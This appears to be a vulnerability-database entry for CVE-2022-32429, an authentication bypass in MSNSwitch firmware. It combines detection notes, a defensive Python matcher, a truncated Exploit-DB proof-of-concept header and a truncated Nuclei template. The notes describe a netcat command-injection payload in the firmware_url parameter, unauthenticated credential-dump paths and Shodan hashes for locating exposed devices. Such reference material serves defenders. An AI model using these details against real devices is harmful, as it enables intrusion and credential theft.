CVE-2022-32429
Published: 2022-08-10
Priority P187 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 75.72% (99.5th percentile)
An authentication-bypass issue in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh of Mega System Technologies Inc MSNSwitch MNT.2408 allows unauthenticated attackers to arbitrarily configure settings within the application, leading to remote code execution.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| megatech | msnswitch_firmware | — | — |
Detection & IOCs
yara
matchers: word body 'SSID1'; regex header 'filename="Settings(.*).dat' and 'application/octet-stream'; status 200
- Unauthenticated GET request to /cgi-bin-hax/ExportSettings.sh or /cgi-bin-sdb/ExportSettings.sh: a 200 response containing 'SSID1' and a Content-Disposition header matching 'filename="Settings*.dat' with content type 'application/octet-stream' confirms the auth-bypass credential dump.
- RCE is triggered via a GET to /cgi-bin/upgrade.cgi with a crafted firmware_url parameter containing backtick-escaped OS commands piped to netcat (e.g., firmware_url=http://...`CMD|nc HOST PORT`/filename?).
- Credential extraction: parse the unauthenticated ExportSettings.sh response for lines matching 'Account1=' and 'Password1=' to recover plaintext admin credentials.
- CSRF token is extracted from /saveUpgrade.asp after authenticated login; look for the pattern '?csrftoken=' in the page body. Its presence indicates the device is an MSNSwitch target.
- Use Shodan favicon hashes to identify exposed MSNSwitch devices on the internet: http.favicon.hash:-2073748627 or http.favicon.hash:-1721140132.
- The unauthenticated configuration dump (ExportSettings.sh) only requires HTTP access from any network, but the full RCE via upgrade.cgi requires the attacker to be on the same subnet as the device.
- Two distinct vulnerable paths exist: /cgi-bin-sdb/ExportSettings.sh (referenced in the NVD advisory) and /cgi-bin-hax/ExportSettings.sh (used in the working exploit PoC); both should be blocked.
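The matchers listed above, applied to a captured HTTP response (for example from a proxy log or IDS capture), as an added example that is not code from the page, the exploit or the Nuclei template: it parses a raw response, reports whether it carries the ExportSettings.sh auth-bypass signature, and redacts the Account1/Password1 lines before the finding is stored. The sample responses are constructed, and the parser assumes CRLF line endings.

```python
import re

# Matchers from the detection notes above: status 200, the word 'SSID1' in the
# body, a Content-Disposition naming Settings*.dat (regex copied as on the page)
# and an application/octet-stream content type.
FILENAME_RE = re.compile(r'filename="Settings(.*).dat')
# Credential lines the dump leaks; redacted before a finding is logged.
CRED_RE = re.compile(r"^(Account1|Password1)=[^\r\n]*", re.MULTILINE)

# Constructed sample of a leaking response (all values are made up).
SAMPLE_LEAK = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: application/octet-stream\r\n"
    'Content-Disposition: attachment; filename="Settings_MNT2408.dat"\r\n'
    "\r\n"
    "SSID1=lab-wifi\r\n"
    "Account1=admin\r\n"
    "Password1=example-only\r\n"
)
# Constructed sample of a device that still enforces authentication.
SAMPLE_BENIGN = "HTTP/1.1 401 Unauthorized\r\nContent-Type: text/html\r\n\r\n<html>login</html>"


def parse_http_response(raw):
    """Split a raw CRLF HTTP/1.x response into (status, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split()
    status = int(parts[1]) if len(parts) >= 2 and parts[1].isdigit() else 0
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def matches_export_settings_leak(raw):
    """True when the response carries the ExportSettings.sh auth-bypass signature."""
    status, headers, body = parse_http_response(raw)
    if status != 200 or "SSID1" not in body:
        return False
    disposition = headers.get("content-disposition", "")
    ctype = headers.get("content-type", "")
    return bool(FILENAME_RE.search(disposition)) and "application/octet-stream" in ctype


def redact_credentials(body):
    """Mask the plaintext admin credential lines before storing the evidence."""
    return CRED_RE.sub(lambda m: m.group(1) + "=<redacted>", body)
```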
No detection rules found.
Exploit-DB
MSNSwitch Firmware MNT.2408 - Remote Code Execution
exploitdb · 2022-11-11 · CVSS 9.8
---
Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Execution (RCE)
Google Dork: n/a
Date: 9/1/2022
Exploit Author: Eli Fulkerson
Vendor Homepage: https://www.msnswitch.com/
Version: MNT.2408
Tested on: MNT.2408 firmware
CVE: CVE-2022-32429
```python
#!/usr/bin/python3
"""
POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408.
Configuration dump only requires HTTP access.
Full RCE requires you to be on the same subnet as the device.
"""
import requests
import sys
import urllib.parse
import readline
import random
import string

# listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST
LISTENER_HOST = "192.168.EDIT.ME"
LISTENER_PORT = 3434

# target msnswitch
TARGET = "192.168.EDIT.ME2"
PORT = 80
USER
```
Nuclei
MSNSwitch Firmware MNT.2408 - Authentication Bypass
nuclei · CVSS 9.8
MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
Template:

```yaml
id: CVE-2022-32429

info:
  name: MSNSwitch Firmware MNT.2408 - Authentication Bypass
  author: theabhinavgaur
  severity: critical
  description: |
    MSNSwitch Firmware MNT.2408 is susceptible to authentication bypass in the component http://MYDEVICEIP/cgi-bin-sdb/ExportSettings.sh. An attacker can arbitrarily configure settings, leading to possible remote code execution and subsequent unauthorized operations.
  impact: |
    Successful exploitation of this vulnerability allows an
```
No writeups or analysis indexed.